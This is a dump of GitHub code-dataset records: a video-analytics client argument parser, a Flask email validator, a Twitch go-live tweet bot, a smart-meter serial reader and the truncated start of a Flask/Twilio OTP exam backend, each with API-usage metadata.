{"api_name": "flights.platform.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 24, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 24, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 25, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 25, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flights.platform.models.Flight.objects.create", "line_number": 36, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight", "line_number": 36, "usage_type": "attribute"}, {"api_name": "flights.platform.models", "line_number": 36, "usage_type": "name"}, {"api_name": "mimesis.random.Random", "line_number": 38, "usage_type": "call"}, {"api_name": "mimesis.Address", "line_number": 39, "usage_type": "call"}, {"api_name": "mimesis.Address", "line_number": 40, "usage_type": "call"}, {"api_name": "mimesis.Datetime", "line_number": 41, "usage_type": "call"}, {"api_name": "mimesis.Datetime", "line_number": 42, "usage_type": "call"}, {"api_name": "mimesis.Numbers", "line_number": 43, "usage_type": "call"}, {"api_name": "mimesis.Numbers", "line_number": 44, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 33, "usage_type": "attribute"}, {"api_name": "django.shortcuts.reverse", "line_number": 51, "usage_type": "call"}, {"api_name": "django.shortcuts.reverse", "line_number": 57, "usage_type": "call"}, {"api_name": "django.shortcuts.reverse", "line_number": 66, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 81, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 81, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 82, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 82, "usage_type": "name"}, {"api_name": "django.shortcuts.reverse", "line_number": 87, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight.objects.get", 
"line_number": 94, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight", "line_number": 94, "usage_type": "attribute"}, {"api_name": "flights.platform.models", "line_number": 94, "usage_type": "name"}, {"api_name": "django.shortcuts.reverse", "line_number": 103, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight.objects.get", "line_number": 110, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight", "line_number": 110, "usage_type": "attribute"}, {"api_name": "flights.platform.models", "line_number": 110, "usage_type": "name"}, {"api_name": "django.shortcuts.reverse", "line_number": 116, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight.objects.filter", "line_number": 122, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight", "line_number": 122, "usage_type": "attribute"}, {"api_name": "flights.platform.models", "line_number": 122, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 126, "usage_type": "call"}, {"api_name": "flights.platform", "line_number": 126, "usage_type": "argument"}, {"api_name": "django.shortcuts.reverse", "line_number": 128, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight.objects.count", "line_number": 143, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight", "line_number": 143, "usage_type": "attribute"}, {"api_name": "flights.platform.models", "line_number": 143, "usage_type": "name"}, {"api_name": "django.shortcuts.reverse", "line_number": 146, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 140, "usage_type": "attribute"}, {"api_name": "pytest.mark.usefixtures", "line_number": 141, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 141, "usage_type": "attribute"}, {"api_name": "flights.platform.models.Flight.objects.count", "line_number": 163, "usage_type": "call"}, {"api_name": "flights.platform.models.Flight", "line_number": 163, "usage_type": "attribute"}, {"api_name": "flights.platform.models", "line_number": 163, "usage_type": "name"}, {"api_name": "django.shortcuts.reverse", "line_number": 165, "usage_type": "call"}]}
+{"seq_id": "71341047128", "text": "import os\nimport sys\nimport json\nimport argparse\nfrom common.util import validate_extension_config\nfrom common import constants\n\ndef parse_args(args=None, program_name=\"DL Streamer Edge AI Extension Client\"):\n parser = argparse.ArgumentParser(\n prog=program_name,\n fromfile_prefix_chars=\"@\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n\n parser.add_argument(\n \"--protocol\",\n type=str.lower,\n choices=[constants.GRPC_PROTOCOL, constants.HTTP_PROTOCOL],\n help=\"Extension protocol (grpc or http)\",\n default=os.getenv(\"PROTOCOL\", \"grpc\").lower(),\n )\n\n parser.add_argument(\n \"-s\",\n metavar=(\"grpc_server_address\"),\n dest=\"grpc_server_address\",\n help=\"gRPC server address.\",\n default=None,\n )\n parser.add_argument(\n \"--server-ip\",\n help=\"server ip.\",\n default=\"localhost\",\n type=str,\n )\n\n parser.add_argument(\n \"--http-url\",\n help=\"http Full URL.\",\n type=str,\n )\n\n parser.add_argument(\n \"--http-stream-id\",\n help=\"stream id to assign pipeline to\",\n dest=\"stream_id\",\n type=str,\n )\n\n parser.add_argument(\n \"--http-image-encoding\",\n dest=\"encoding\",\n help=\" HTTP image encoding\",\n default=\"jpeg\",\n type=str,\n choices=[\"jpeg\", \"png\", \"bmp\"],\n )\n\n parser.add_argument(\n \"--grpc-port\",\n help=\"grpc server port.\",\n type=int,\n default=int(os.getenv(\"GRPC_PORT\", constants.GRPC_PORT)),\n )\n\n parser.add_argument(\n \"--http-port\",\n help=\"http server port.\",\n type=int,\n default=int(os.getenv(\"HTTP_PORT\", constants.HTTP_PORT)),\n )\n\n parser.add_argument(\n \"-f\",\n \"--sample-file-path\",\n metavar=(\"sample_file\"),\n dest=\"sample_file\",\n help=\"Name of the sample video frame.\",\n default=\"/home/edge-ai-extension/sampleframes/sample01.png\",\n )\n parser.add_argument(\n \"--max-frames\",\n metavar=(\"max_frames\"),\n help=\"How many frames to send from video.\",\n type=int,\n default=sys.maxsize,\n )\n parser.add_argument(\n \"-l\",\n \"--loop-count\",\n metavar=(\"loop_count\"),\n help=\"How many times to loop the source after it finishes.\",\n type=int,\n default=0,\n )\n parser.add_argument(\n \"--fps-interval\",\n help=\"How often to report FPS (every N seconds)\",\n type=int,\n default=2,\n )\n parser.add_argument(\n \"--frame-rate\",\n help=\"How many frames to send per second (-1 is no limit)\",\n type=int,\n default=-1,\n )\n parser.add_argument(\n \"--frame-queue-size\",\n help=\"Max number of frames to buffer in client (0 is no limit)\",\n type=int,\n default=200,\n )\n parser.add_argument(\n \"-m\",\n \"--shared-memory\",\n action=\"store_const\",\n dest=\"use_shared_memory\",\n const=True,\n default=False,\n help=\"set to use shared memory\",\n )\n # nosec skips pybandit hits\n parser.add_argument(\n \"-o\",\n \"--output-file-path\",\n metavar=(\"output_file\"),\n dest=\"output_file\",\n help=\"Output file path\",\n default=\"/tmp/results.jsonl\",\n ) # nosec\n\n parser.add_argument(\n \"--pipeline-name\",\n action=\"store\",\n help=\"name of the pipeline to run\",\n type=str,\n default=\"object_detection\",\n )\n\n parser.add_argument(\n \"--pipeline-version\",\n action=\"store\",\n help=\"version of the pipeline to run\",\n type=str,\n default=\"person_vehicle_bike\",\n )\n\n parser.add_argument(\n \"--pipeline-parameters\",\n action=\"store\",\n type=str,\n default=\"\",\n )\n\n parser.add_argument(\n \"--pipeline-extensions\",\n action=\"store\",\n type=str,\n default=\"\",\n )\n\n parser.add_argument(\n 
\"--frame-destination\",\n action=\"store\",\n type=str,\n default=\"\",\n )\n\n parser.add_argument(\n \"--scale-factor\",\n action=\"store\",\n help=\"scale factor for decoded images\",\n type=float,\n default=1.0,\n )\n\n parser.add_argument(\n \"--extension-config\",\n action=\"store\",\n help=\"extension config in .json file path or as string\",\n default=\"\",\n ) # nosec\n\n parser.add_argument(\"--version\", action=\"version\", version=\"%(prog)s 1.0\")\n if isinstance(args, dict):\n args = [\"--{}={}\".format(key, value) for key, value in args.items() if value]\n result = parser.parse_args(args)\n if not result.grpc_server_address:\n result.grpc_server_address = \"{}:{}\".format(\n result.server_ip, result.grpc_port\n )\n return result\n\n\ndef _create_extension_config(args):\n extension_config = {}\n pipeline_config = {}\n if args.pipeline_name:\n pipeline_config[\"name\"] = args.pipeline_name\n if args.pipeline_version:\n pipeline_config[\"version\"] = args.pipeline_version\n if args.pipeline_parameters:\n try:\n pipeline_config[\"parameters\"] = json.loads(\n args.pipeline_parameters)\n except ValueError as err:\n raise Exception(\"Issue loading pipeline parameters: {}\".format(\n args.pipeline_parameters)) from err\n if args.frame_destination:\n try:\n pipeline_config[\"frame-destination\"] = json.loads(\n args.frame_destination)\n except ValueError as err:\n raise Exception(\"Issue loading frame destination: {}\".format(\n args.frame_destination)) from err\n if args.pipeline_extensions:\n try:\n pipeline_config[\"extensions\"] = json.loads(\n args.pipeline_extensions)\n except ValueError as err:\n raise Exception(\"Issue loading pipeline extensions: {}\".format(\n args.pipeline_extensions)) from err\n\n if len(pipeline_config) > 0:\n extension_config.setdefault(\"pipeline\", pipeline_config)\n\n return extension_config\n\n\ndef get_extension_config(args):\n extension_config = {}\n if args.extension_config:\n if args.extension_config.endswith(\".json\"):\n with open(args.extension_config, \"r\") as config:\n extension_config = json.loads(config.read())\n else:\n extension_config = json.loads(args.extension_config)\n else:\n extension_config = _create_extension_config(args)\n\n validate_extension_config(extension_config)\n\n return extension_config\n", "repo_name": "dlstreamer/edge-ai-extension", "sub_path": "client/arguments.py", "file_name": "arguments.py", "file_ext": "py", "file_size_in_byte": 6645, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 12, "usage_type": "attribute"}, {"api_name": "common.constants.GRPC_PROTOCOL", "line_number": 18, "usage_type": "attribute"}, {"api_name": "common.constants", "line_number": 18, "usage_type": "name"}, {"api_name": "common.constants.HTTP_PROTOCOL", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 20, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 63, "usage_type": "call"}, {"api_name": "common.constants.GRPC_PORT", "line_number": 63, "usage_type": "attribute"}, {"api_name": "common.constants", "line_number": 63, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 70, "usage_type": "call"}, {"api_name": "common.constants.HTTP_PORT", "line_number": 70, "usage_type": "attribute"}, {"api_name": "common.constants", "line_number": 70, "usage_type": 
"name"}, {"api_name": "sys.maxsize", "line_number": 86, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 205, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 212, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 219, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 236, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 238, "usage_type": "call"}, {"api_name": "common.util.validate_extension_config", "line_number": 242, "usage_type": "call"}]}
+{"seq_id": "38785561333", "text": "from flask import Flask, render_template, request, redirect, session, flash\napp = Flask(__name__) \nfrom mysqlconnection import connectToMySQL\napp = Flask(__name__)\nmysql = connectToMySQL('emailval')\napp.secret_key = 'secrets' \nimport re\nEMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\\.[a-zA-Z]+$')\n\n@app.route('/') \ndef index():\n return render_template(\"Email_Val.html\")\n\n\n@app.route('/process', methods=['POST'])\ndef process():\n\tif len(request.form.get('email', \"\")) < 1:\n\t\tflash ('Needs email!')\n\telif not EMAIL_REGEX.match(request.form['email']):\n\t\tflash(\"Invalid Email!\")\n\t\treturn redirect('/')\n\telse:\n\t\tquery = \"SELECT * FROM email WHERE email (email, created_at, updated_at) VALUES (%(email)s, NOW(), NOW());\"\n\t\tdata = {'email': request.form['email']}\n\t\tresults = mysql.query_db(query, data)\n\t\tif results:\n\t\t\tflash(\"email already exists!\")\n\t\t\treturn redirect(\"/\")\n\treturn ('Success!')\t\n\napp.run(debug=True) ", "repo_name": "avanover0311/Python", "sub_path": "flask/emailVal.py", "file_name": "emailVal.py", "file_ext": "py", "file_size_in_byte": 934, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "flask.Flask", "line_number": 2, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "mysqlconnection.connectToMySQL", "line_number": 5, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "2000386891", "text": "# Pacotes de terceiros\r\nimport os\r\nimport threading\r\nimport time\r\n\r\nimport schedule\r\nfrom dotenv import load_dotenv\r\n\r\n# Preparar o env\r\nload_dotenv()\r\n\r\nfrom db import insert_on_stream, return_streamer_info\r\nfrom tt import tweet\r\nfrom twitch import (get_OAuth, get_stream_title, get_streamer_name,\r\n is_streamer_live)\r\nfrom utils import remove_cmds_from_title\r\n\r\n# Lista das categorias permitidas\r\ncategories = [\r\n \"Art\",\r\n \"Science & Technology\",\r\n \"Software and Game Development\",\r\n \"Makers & Crafting\",\r\n \"Talk Shows & Podcasts\",\r\n]\r\n\r\n\r\ndef main():\r\n\r\n # Definir tokens e header\r\n access_token, header = get_OAuth()\r\n\r\n # Retornar dados dos streamers\r\n results = return_streamer_info().fetchall()\r\n\r\n # Iterar streamers\r\n for streamer in results:\r\n\r\n # ID Twitch\r\n idt = streamer[1]\r\n\r\n # Verificar se está em live e retornar categoria a streamar\r\n is_live, category = is_streamer_live(idt, header)\r\n\r\n # Verificar se:\r\n # 1 - Está online\r\n # 2 - Está numa categoria permitida\r\n if is_live and category in categories:\r\n\r\n # Verificar se ele já estava live antes (na base de dados)\r\n is_live = streamer[4]\r\n\r\n # if not is_live and db.streamer_timeout(idt):\r\n if not is_live:\r\n\r\n # Titulo da live\r\n title = get_stream_title(idt, header)\r\n\r\n # Remover comandos do título\r\n title = remove_cmds_from_title(title)\r\n\r\n # Obter o URL atualiazado do canal\r\n twitch, name = get_streamer_name(idt, header)\r\n\r\n # Informações do streamer vindas da base de dados\r\n twitter = streamer[3]\r\n is_print = streamer[5]\r\n streamer_type = streamer[6]\r\n hashtags = streamer[7]\r\n\r\n # Como está em live, vamos deixar verdadeiro na base de dados\r\n insert_on_stream(idt, True)\r\n\r\n # Vamos fazer o tweet\r\n tweet(\r\n idt,\r\n name,\r\n twitch,\r\n twitter,\r\n title,\r\n is_print,\r\n streamer_type,\r\n category,\r\n hashtags,\r\n )\r\n else:\r\n # Caso não esteja em live, definir como falso\r\n insert_on_stream(idt, False)\r\n\r\n\r\ndef threaded_job(job):\r\n # Função para correr a main em modo threading\r\n thread = threading.Thread(target=main)\r\n thread.start()\r\n\r\n # Esperar pela thread terminar\r\n thread.join()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n schedule.every(15).seconds.do(threaded_job, main)\r\n\r\n while True:\r\n schedule.run_pending()\r\n\r\n # Performance measure\r\n time.sleep(10)\r\n", "repo_name": "andressansantos/divulgador-live", "sub_path": "src/bot/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2879, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 10, "usage_type": "call"}, {"api_name": "twitch.get_OAuth", "line_number": 31, "usage_type": "call"}, {"api_name": "db.return_streamer_info", "line_number": 34, "usage_type": "call"}, {"api_name": "twitch.is_streamer_live", "line_number": 43, "usage_type": "call"}, {"api_name": "twitch.get_stream_title", "line_number": 57, "usage_type": "call"}, {"api_name": "utils.remove_cmds_from_title", "line_number": 60, "usage_type": "call"}, {"api_name": "twitch.get_streamer_name", "line_number": 63, "usage_type": "call"}, {"api_name": "db.insert_on_stream", "line_number": 72, "usage_type": "call"}, {"api_name": "tt.tweet", "line_number": 75, "usage_type": "call"}, {"api_name": "db.insert_on_stream", "line_number": 88, "usage_type": 
"call"}, {"api_name": "threading.Thread", "line_number": 93, "usage_type": "call"}, {"api_name": "schedule.every", "line_number": 102, "usage_type": "call"}, {"api_name": "schedule.run_pending", "line_number": 105, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 108, "usage_type": "call"}]}
+{"seq_id": "32749564465", "text": "# -*- coding: utf-8 -*-\n\nimport sys\nimport time\nimport datetime\n\n# シリアルポート通信制御用のクラス\nclass SerialUtil():\n def __init__(self, serial, store):\n self.ser = serial\n self.store = store\n\n # ポートへの書き込み raw: bytes\n def writeb(self, raw):\n return self.ser.write(raw)\n\n # ポートへの書き込み cmd: 文字列\n # 文字列をバイト列に変換し、末尾に改行を付ける\n def write(self, cmd):\n return self.ser.write((cmd+\"\\r\\n\").encode())\n\n # ポートから1行読む\n def read(self):\n return self.ser.readline().decode()\n\n # 0.1秒待ちながらバッファが無くなるまで読む(読んだ結果は画面に表示)\n def readWhile(self):\n time.sleep(0.1)\n while self.ser.in_waiting > 0 :\n print(\"read: \"+self.read(), end=\"\")\n time.sleep(0.1)\n\n # シリアルポートにコマンド送信\n # その後、エコーバックと結果を画面に表示\n def command(self, cmd):\n print(\"command: \" + cmd)\n self.write(cmd)\n print(\"echo: \"+self.read(), end=\"\") # エコーバック\n time.sleep(0.1)\n while self.ser.in_waiting > 0 :\n print(\"back: \"+self.read(), end=\"\")\n time.sleep(0.1)\n\n # コマンドを送信し、結果を文字列で得る\n def func(self, cmd):\n print(\"func: \" + cmd)\n self.write(cmd)\n print(\"echo: \"+self.read(), end=\"\") # エコーバック\n time.sleep(0.1)\n return self.read()\n\n # スマートメーターを探す処理\n def scan(self):\n print(\"scan\")\n scanDuration = 4; # スキャン時間。サンプルでは6なんだけど、4でも行けるので。(ダメなら増やして再試行)\n scanRes = {} # スキャン結果の入れ物\n\n # スキャンのリトライループ(何か見つかるまで)\n while \"Channel\" not in scanRes :\n # アクティブスキャン(IE あり)を行う\n # 時間かかります。10秒ぐらい?\n self.write(\"SKSCAN 2 FFFFFFFF \" + str(scanDuration))\n\n # スキャン1回について、スキャン終了までのループ\n scanEnd = False\n while not scanEnd :\n line = self.read()\n print(\"read: \"+line, end=\"\")\n\n if line.startswith(\"EVENT 22\") :\n # スキャン終わったよ(見つかったかどうかは関係なく)\n scanEnd = True\n elif line.startswith(\" \") :\n # スキャンして見つかったらスペース2個あけてデータがやってくる\n # 例\n # Channel:39\n # Channel Page:09\n # Pan ID:FFFF\n # Addr:FFFFFFFFFFFFFFFF\n # LQI:A7\n # PairID:FFFFFFFF\n cols = line.strip().split(':')\n scanRes[cols[0]] = cols[1]\n scanDuration+=1\n\n if 7 < scanDuration and \"Channel\" not in scanRes:\n # 引数としては14まで指定できるが、7で失敗したらそれ以上は無駄っぽい\n print(\"err: スキャンリトライオーバー\")\n sys.exit(1) # エラー終了\n return scanRes\n\n # スマートメーターとの接続待ち\n def waitToConnect(self):\n while True :\n line = self.read()\n print(\"wait: \"+line, end=\"\")\n if line.startswith(\"EVENT 24\") :\n print(\"err: PANA 接続失敗\")\n sys.exit(1) # エラー終了\n elif line.startswith(\"EVENT 25\") :\n # 接続完了!\n return\n\n # 電力情報取得メイン処理\n def observeWatt(self, ipv6Addr):\n cnt = 0\n while True:\n cnt+=1\n print(\"count: {0}\".format(cnt))\n # ECHONET Lite フレーム作成\n # 参考資料\n # ・ECHONET-Lite_Ver.1.12_02.pdf (以下 EL)\n # ・Appendix_H.pdf (以下 AppH)\n echonetLiteFrame = b\"\"\n echonetLiteFrame += b\"\\x10\\x81\" # EHD (参考:EL p.3-2)\n echonetLiteFrame += b\"\\x00\\x01\" # TID (参考:EL p.3-3)\n # ここから EDATA\n echonetLiteFrame += b\"\\x05\\xFF\\x01\" # SEOJ (参考:EL p.3-3 AppH 「3.6 管理・操作関連機器クラスグループ 」)\n echonetLiteFrame += b\"\\x02\\x88\\x01\" # DEOJ (参考:EL p.3-3 AppH 「3.3.25 低圧スマート電力量メータクラス規定」)\n echonetLiteFrame += b\"\\x62\" # ESV(62:プロパティ値読み出し要求) (参考:EL p.3-5)\n echonetLiteFrame += b\"\\x03\" # OPC(1個)(参考:EL p.3-7)\n echonetLiteFrame += b\"\\xE0\" # E0: 積算電力量\n echonetLiteFrame += b\"\\x00\" #\n echonetLiteFrame += b\"\\xE1\" # E1: 積算電力量の単位\n echonetLiteFrame += b\"\\x00\" #\n echonetLiteFrame += b\"\\xE7\" # E7: 瞬間電力量計測値\n echonetLiteFrame += b\"\\x00\" #\n\n # コマンド送信\n command = b\"SKSENDTO 1 \"+ipv6Addr.encode()+b\" 0E1A 1 \"+format(len(echonetLiteFrame),\"04X\").encode()+b\" \" + echonetLiteFrame\n print(\"command: {0}\".format(command))\n self.writeb(command)\n\n waitTime = 0\n while True:\n 
time.sleep(0.1)\n if self.ser.in_waiting == 0 : # データが来てなかったら1秒待つ\n waitTime += 1\n if waitTime > 10:\n print(\"timeout!! \" + str(waitTime))\n break\n print(\"wait.. \" + str(waitTime))\n time.sleep(1)\n continue\n print(\"read..\")\n line = self.read()\n waitTime = 0\n print(\"read: \" + line, end=\"\")\n\n # 受信データはたまに違うデータが来たり、\n # 取りこぼしたりして変なデータを拾うことがあるので\n # チェックを厳しめにしてます。\n if line.startswith(\"ERXUDP\") :\n print(\"ERXUDP\")\n cols = line.strip().split(' ')\n res = cols[8] # UDP受信データ部分\n #tid = res[4:4+4];\n seoj = res[8:8+6]\n #deoj = res[14,14+6]\n ESV = res[20:20+2]\n #OPC = res[22,22+2]\n if seoj == \"028801\" and ESV == \"72\" :\n # スマートメーター(028801)から来た応答(72)なら\n EPC = res[24:24+2]\n # 先頭内容が積算電力量(E0)だったら\n if EPC == \"E0\" :\n pwMul = int(res[40:42], 16) # 位置取りコード\n pwTotal = round(int(res[28:36], 16) * self.multi(pwMul), 1) # 積算消費電力量\n pw = int(res[46:54], 16) # 瞬��消費電力量\n print(u\"計測値:{0}[W], {1}[kW], {2}\".format(pw, pwTotal, pwMul))\n self.store.store(datetime.datetime.now(), pw, pwTotal)\n break\n time.sleep(10) # 10秒\n\n # 積算消費電力量の倍率を返す\n def multi(self, x):\n if x == 0:\n return 1\n if x == 1:\n return 0.1\n if x == 2:\n return 0.01\n if x == 3:\n return 0.001\n if x == 4:\n return 0.0001\n if x == 10:\n return 10\n if x == 11:\n return 100\n if x == 12:\n return 1000\n if x == 13:\n return 10000\n print(\"err: 不明な係数\" + x)\n sys.exit(1) \n\n", "repo_name": "qtamaki/smart-meter", "sub_path": "serialUtil.py", "file_name": "serialUtil.py", "file_ext": "py", "file_size_in_byte": 7007, "program_lang": "python", "lang": "ja", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 42, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 49, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 99, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 136, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 143, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 171, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 171, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 173, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 196, "usage_type": "call"}]}
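The fixed-offset slicing in `observeWatt` can be exercised without a meter. A sketch with a hand-built response payload (the hex values below are fabricated for illustration; the offsets are the ones used in the code above):

```python
def decode(res):
    # res is the hex-encoded UDP payload from an ERXUDP line.
    seoj = res[8:8 + 6]    # source ECHONET object
    esv = res[20:20 + 2]   # service code; 72 = read response
    epc = res[24:24 + 2]   # first property code
    if seoj == "028801" and esv == "72" and epc == "E0":
        total_raw = int(res[28:36], 16)  # cumulative energy, unscaled
        unit_code = int(res[40:42], 16)  # multiplier code from E1
        watts = int(res[46:54], 16)      # instantaneous power [W]
        return total_raw, unit_code, watts
    return None


# EHD/TID, SEOJ, DEOJ, ESV, OPC, then three EPC/PDC/EDT triples.
sample = ("1081" "0001" "028801" "05FF01" "72" "03"
          "E0" "04" "00001234"
          "E1" "01" "01"
          "E7" "04" "000001F4")
total_raw, unit_code, watts = decode(sample)
print(total_raw * 0.1, watts)  # 466.0 kWh (unit code 0x01 -> x0.1), 500 W
```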
+{"seq_id": "29120676373", "text": "import os\r\nfrom bson import json_util\r\nfrom flask import Flask, request, render_template, jsonify\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom datetime import datetime, date\r\nfrom mongo import insertDocument, readDocuments, appendDoc, checkifexists, fetch_marks\r\nimport json\r\nfrom twilio.rest import Client\r\nfrom dotenv import load_dotenv\r\n\r\n\r\nload_dotenv()\r\nSQLALCHEMY_DATABASE_URI = os.environ.get(\"SQLALCHEMY_DATABASE_URI\")\r\naccount_sid = os.environ.get(\"account_sid\")\r\nauth_token = os.environ.get(\"auth_token\")\r\nverify_sid = os.environ.get(\"verify_sid\")\r\n\r\n\r\napp = Flask(__name__)\r\ndb = SQLAlchemy()\r\n# app.config[\"SQLALCHEMY_DATABASE_URI\"] = os.environ.get(\"Database_URL\")\r\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = SQLALCHEMY_DATABASE_URI\r\ndb.init_app(app)\r\n\r\n#####============================ AMAZON S3 BUCKET CONFIFURATION=================================================####\r\n\r\n# S3_BUCKET = \"my-bucket-name\"\r\n# S3_KEY = \"AWS_ACCESS_KEY_ID\"\r\n# S3_SECRET = \"AWS_SECRET_ACCESS_KEY\"\r\n# S3_LOCATION = 'http://{}.s3.amazonaws.com/'.format(S3_BUCKET)\r\n\r\n#####============================ AMAZON S3 BUCKET CONFIFURATION=================================================####\r\n\r\n####======================================TWILIO INTEGRATION====================================================####\r\n\r\naccount_sid = account_sid\r\nauth_token = auth_token\r\nverify_sid = verify_sid\r\n\r\n\r\n@app.route(\"/smsotpPhone\", methods=[\"GET\", \"POST\"])\r\ndef otp_create():\r\n if request.method == 'POST':\r\n verified_number=request.json['phonenumber']\r\n client = Client(account_sid, auth_token)\r\n\r\n verification = client.verify.v2.services(verify_sid) \\\r\n .verifications \\\r\n .create(to=verified_number, channel=\"sms\")\r\n print(verification.status)\r\n return jsonify({\"Status\": \"OTP SENT SUCCUSSFULLY\"})\r\n\r\n\r\n@app.route(\"/smsotpver/\", methods=[\"GET\", \"POST\"])\r\ndef otp_check(verified_number):\r\n if request.method == 'POST':\r\n otp_code=request.json['otpcode']\r\n client = Client(account_sid, auth_token)\r\n verification_check = client.verify.v2.services(verify_sid) \\\r\n .verification_checks \\\r\n .create(to=verified_number, code=otp_code)\r\n ans= (verification_check.status)\r\n print(ans)\r\n return jsonify({\"verification_status\":ans})\r\n\r\n\r\n####======================================TWILIO INTEGRATION ENDS====================================================####\r\n\r\nclass Students(db.Model):\r\n enrollment_number = db.Column(db.BigInteger, primary_key=True)\r\n name = db.Column(db.String, nullable=False)\r\n email = db.Column(db.String, unique=True, nullable=False)\r\n phone_number = db.Column(db.String, unique=True, nullable=False)\r\n\r\nclass Exams(db.Model):\r\n examid= db.Column(db.Integer, primary_key= True)\r\n exam_name = db.Column(db.String, nullable= False)\r\n exam_startdate= db.Column(db.String, nullable = False)\r\n exam_starttime = db.Column(db.String, nullable=False)\r\n semester= db.Column(db.Integer, nullable= False)\r\n ## 2022-03-21 19:04:14\r\n exam_duration = db.Column(db.Integer, nullable = False)\r\n subject_code= db.Column(db.String, nullable = False)\r\n session= db.Column(db.String, nullable = False)\r\n\r\nclass Teacher(db.Model):\r\n teacherid= db.Column(db.String, nullable = False, primary_key=True)\r\n name= db.Column(db.String, nullable= False)\r\n phonenumber= db.Column(db.String, nullable = False)\r\n email= 
db.Column(db.String, nullable = False)\r\n\r\nwith app.app_context():\r\n    db.create_all()\r\n    db.session.commit()\r\n\r\n####=====================================DATABASE ENDS HERE=========================================================================####\r\n\r\n\r\n####==================================STUDENT SECTION STARTS==========================================================================####\r\n@app.route(\"/signup\", methods=[\"GET\", \"POST\"])\r\ndef user_create():\r\n    if request.method == 'POST':\r\n        enrollment_number = request.json['enrollment_number']\r\n        name = request.json['name']\r\n        email = request.json['email']\r\n        phone_number = request.json['phone_number']\r\n        users = Students(enrollment_number=enrollment_number, name=name, email=email, phone_number=phone_number)\r\n        with app.app_context():\r\n            db.session.add(users)\r\n            db.session.commit()\r\n        j=jsonify({\"enrollment_number\":enrollment_number, \"name\":name, \"email\":email, \"phone\":phone_number})\r\n        dict= {\"enrollment_number\":enrollment_number, \"name\":name, \"email\":email, \"phone\":phone_number}\r\n        insertDocument(dict)\r\n        return jsonify({\"auth\":True})\r\n\r\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\r\ndef login():\r\n    if request.method==\"POST\":\r\n        enrollment_number = request.json['enrollment_number']\r\n        phone_number = request.json['phone_number']\r\n        with app.app_context():\r\n            